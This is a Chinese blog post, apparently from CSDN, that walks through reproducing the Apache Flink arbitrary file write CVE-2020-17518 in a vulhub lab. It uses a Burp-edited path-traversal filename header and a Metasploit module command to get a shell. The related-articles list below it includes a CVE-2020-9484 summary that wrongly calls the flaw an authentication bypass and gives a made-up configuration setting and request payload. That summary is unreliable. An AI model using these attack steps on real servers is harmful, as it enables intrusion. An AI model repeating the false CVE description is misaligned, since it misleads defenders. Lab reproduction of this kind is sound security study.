CVE-2020-17518漏洞复现

最新推荐文章于 2023-02-08 16:43:37 发布
最新推荐文章于 2023-02-08 16:43:37 发布
阅读量1.4k 收藏 4
点赞数 2
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48736242/article/details/127137267
版权

        备考期间,一周一次的半天休息时间,正好尝试一下复现漏洞。

        前期准备:

                kali linux,vulhub靶场环境

        环境准备:           

        1.使用命令:

cd vulhub/flink/CVE-2020-17518

docker-compose up -d

docker-compose ps

 由此成功打开cve-2020-17518漏洞环境

查看信息发现对应的端口是8081,在浏览器输入之后得到页面:

 漏洞原理

        Apache Flink 1.5.1引入了REST处理程序,该处理程序允许恶意修改HTTP HEADER,将上传的文件写入到本地文件系统上的任意一个位置。

抓包尝试

使用Burp suite进行抓包

打开网页的Submit New Job,这里可以进行文件上传

 任意上传一个文件,并抓包:

发送到Repeter 

发现报错,文件要求上传的类型是jar,更改filename='3.jar'

 

成功上传,发现上传文件的位置在:

/tmp/flink-web-5e836d05-4504-43ad-bfbc-1c915d4a7583/flink-web-upload

在vulhub靶场环境中输入命令:

docker ps 

docker exec -it 30f71358716f /bin/bash

然后遍历一下文件上传位置:

发现文件成功上传

更改HTTP HEADER

filename="../../../1.txt"

 

 虽然返回报错,但是实际上已经上传成功

所以通过修改HTTP HEADER可以将文件上传至任意位置

getshell

1. 打开MSF

msfdb run

 

2. 使用Flink上传攻击文件

use exploit/multi/http/apache_flink_jar_upload_exec

 并设置靶机,运行

set rhosts 192.168.123.129

run

 getshell成功

执行ls命令,可以成功执行命令。

 

总结:

        第一次复现漏洞,菜鸡还是要多跟大师傅走。

代码又崩了?!
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
apache Flink(CVE-2020-17518/17519)附getShell EXP
qq_41027545的博客
01-11 954
安装环境 CVE-2020-17518 1.拉取vulhub环境(github搜vulhub自己下) 2.进入目录 cd vulhub/flink/CVE-2020-17518 3.启动环境 docker-compose up -d 通过浏览器访问http:your-ip:8081界面如下 4.点击Add new按钮抓包 5.进入docker环境,查看是否创建成功 docker ps docker exec -it "docker ID" /bin/bash cd /tmp 6.成功 CVE-
追洞小组 | 实战CVE-2020-17518漏洞
Ms08067安全实验室
02-23 761
文章来源|MS08067 WEB攻防知识星球本文作者:L(Ms08067实验室追洞小组成员)漏洞分析 认准追洞小组一、漏洞名称:Apache Flink 任意文件写入漏洞二、漏洞编号...
Apache Tomcat CVE-2017-12615远程代码执行漏洞分析
weixin_30815469的博客
09-27 1068
2017年9月19日, Apache Tomcat官方发布两个严重的安全漏洞, 其中CVE-2017-12615为远程代码执行漏洞,通过put请求向服务器上传恶意jsp文件, 再通过jsp文件在服务器上执行任意代码, 且最新的补丁未完全修漏洞漏洞编号 CVE-2017-12615 漏洞名称 Apache Tomcat 远程代码执行漏洞 漏洞评级 严重 影响范围 ...
Apache Flink 文件上传漏洞 CVE-2020-17518 漏洞
Senimo
07-28 1683
Apache Flink 文件上传漏洞 CVE-2020-17518 漏洞一、漏洞描述二、漏洞影响三、漏洞1、环境搭建2、漏洞四、漏洞POC五、参考链接 一、漏洞描述 ApacheFlink是一个开源的流处理框架,具有强大的流处理和批处理功能。 ApacheFlink 1.5.1 引入了 REST 处理程序,允许您通过恶意修改的 HTTP 头将上载的文件写入本地文件系统上的任意位置。 二、漏洞影响 1.5.1 < ApacheFlink < 1.11.2 三、漏洞 1、环境搭建
apache flink目录遍历漏洞CVE-2020-17518
ANYOUZHEN的博客
06-04 1291
漏洞描述:apache Flink目录遍历漏洞,可通过REST API读/写远程文件影响版本:Flink 1.5.1-1.11.2接下来开始:我们通过vulhub进行打开vulhub上的flink里的cve-2020-17518使用docker-compose配置相关环境:(在靶场cve-2020-17518使用下面的指令) 然后输入kali密码即可成功启动环境接下来我们查看当前环境:在靶场终端输入: 但是在我的kali2022上面出了报错:8行,和上一篇文章出了一样的问题,上网搜
CVE-2020-17518 Apache Flink 上传路径遍历漏洞
Makboli的博客
07-02 503
CVE-2020-17518 Apache Flink 上传路径遍历漏洞
CVE-2020-17518 flink任意文件上传漏洞
qq_49279082的博客
02-08 2628
本人对CVE-2020-17518漏洞的理解
Linux本地内核提权漏洞(CVE-2019-13272)
m0_48520508的博客
01-19 768
0x00简介 在5.1.17之前的Linux内核中,kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用父子的某些方案来获取root访问权限 进程关系,父进程删除权限并调用execve可能允许攻击者控制。 0x01漏洞概述 Linux执行PTRACE_TRACEME函数时,ptrace_link函数将获得对父进程凭据的RCU引用,然后将该指针指向get_cred函数,但是,对象struct cred的生存周期规则不允许无条.
Apache Flink -任意文件写入漏洞CVE-2020-17518)
chaojixiaojingang
01-07 4016
1.漏洞描述 Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入到本地文件系统上的任意位置。 2.影响版本 1.5.1-1.11.2 3.环境搭建 1)漏洞环境在docker中搭建,进入vulhub/flink/CVE-2020-17518目录 docker-compose up-d 2)访问http://192.168.210.227:80...
Flink高危漏洞 (CVE-2020-17518/17519) 修指南
u013289115的博客
01-19 4264
一、背景二、修方法三、详细步骤1.准备flink源码2.找到修的commit3.编译打包4.替换jar包四、总结 一、背景 ​ 国家信息安全漏洞库(CNNVD)收到关于Apache Flink安全漏洞(CNNVD-202101-271、CVE-2020-17519)(CNNVD-202101-273、CVE-2020-17518)情况的报送。成功利用漏洞的攻击者,可在未授权的情况下,构造恶意数据执行任意文件读取或文件写入攻击,最终获取服务器敏感性信息或权限。Apache Flink 1.5.1 - .
Apache Flink(CVE-2020-17518/17519)任意文件上传和路径遍历漏洞
good good study
01-08 3673
目录 影响范围 docker搭建漏洞环境 漏洞 单个漏洞检测脚本 批量漏洞检测脚本 Apache Flink 是一个分布式流批一体化的开源平台。Flink 的核心是一个提供数据分发、通信以及自动容错的流计算引擎。Flink 在流计算之上构建批处理,并且原生的支持迭代计算,内存管理以及程序优化。式的数据分析开源系统,结合了分布式 MapReduce 类平台的高效,灵活的编程和扩展性,具有强大的流处理和批处理功能。同时在并行数据库发查询优化方案。 2021...
Apache Flink -任意文件写入漏洞CVE-2020-17518)
0xSec
01-11 1407
Apache Flink 是高效和分布式的通用数据处理平台,由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎(简单来说,就是跟spark类似)
CVE-2020-17518&17519 Apache Flink 文件上传&Apache Flink jobmanagerlogs 目录穿越漏洞
ierciyuan的博客
08-04 831
CVE-2020-17518&17519 Apache Flink 文件上传&Apache Flink jobmanagerlogs 目录穿越漏洞
Flink两个漏洞CVE-2020-17518&17519)
黑白的博客
05-02 565
声明 好好学习,天天向上 漏洞描述 Apache Flink 是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。 编号:CVE-2020-17518&17519 Flink 1.5.1引入了REST API,但其实上存在多处缺陷,导致目录遍历和任意文件写入漏洞CVE-2020-17519:攻击者可通过REST API使用…/跳目录实
cve-2020-9484 漏洞
最新发布
08-09
CVE-2020-9484是Apache Tomcat容器中的一种身份验证绕过漏洞。要漏洞,我们需要满足以下条件: 1. 安装Apache Tomcat服务器:首先需要在本地或远程环境中安装Apache Tomcat服务器。确保Tomcat版本为9.0.0.M1至9.0.0.30。 2. 配置Tomcat服务器:在Tomcat的配置文件中(通常是server.xml),需要启用HTTP Connector属性中的restEnabled参数。该参数默认为false,我们需要将其设置为true。 3. 修改用户配置文件:在Tomcat配置文件的users节点中,添加一个或多个用户。为了漏洞,我们需要至少添加一个用户名为test的用户及其密码。 4. 启动Tomcat服务器:启动Tomcat服务器,确保它在本地或远程环境中运行。 5. 发起请求攻击:使用任何Web请求工具(如curl、Postman等),构造以下HTTP请求: POST /servlets-examples/servlet/RequestParamExample HTTP/1.1 Host: [Tomcat服务器IP地址]:[Tomcat服务器端口号] Content-Length: [content-length] Transfer-Encoding: [transfer-encoding] attName=%25%7B%25+%27test%27%2e%25+%27class%27%7d 其中,[Tomcat服务器IP地址]替换为Tomcat服务器的实际IP地址,[Tomcat服务器端口号]替换为Tomcat服务器的实际端口号,[content-length]和[transfer-encoding]分别为请求体的长度和编码方式。 6. 漏洞验证:如果成功漏洞,我们将获得类似以下的服务器响应: HTTP/1.1 200 OK [其他响应头信息] Content-Type: text/html;charset=UTF-8 [其他响应体信息] ${%27test%27.class} 如果响应体中包含"${'test'.class}"的引用,则漏洞已成功。这说明攻击者绕过了身份验证,并成功执行了恶意代码。 需要注意的是,CVE-2020-9484漏洞可能会导致未经授权的远程代码执行,攻击者可以利用此漏洞来执行任意代码,可能导致服务器受到严重影响。在验证漏洞后,建议尽快升级Tomcat服务器,安装相应的补丁或增加其他安全措施,以避免潜在的安全威胁。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值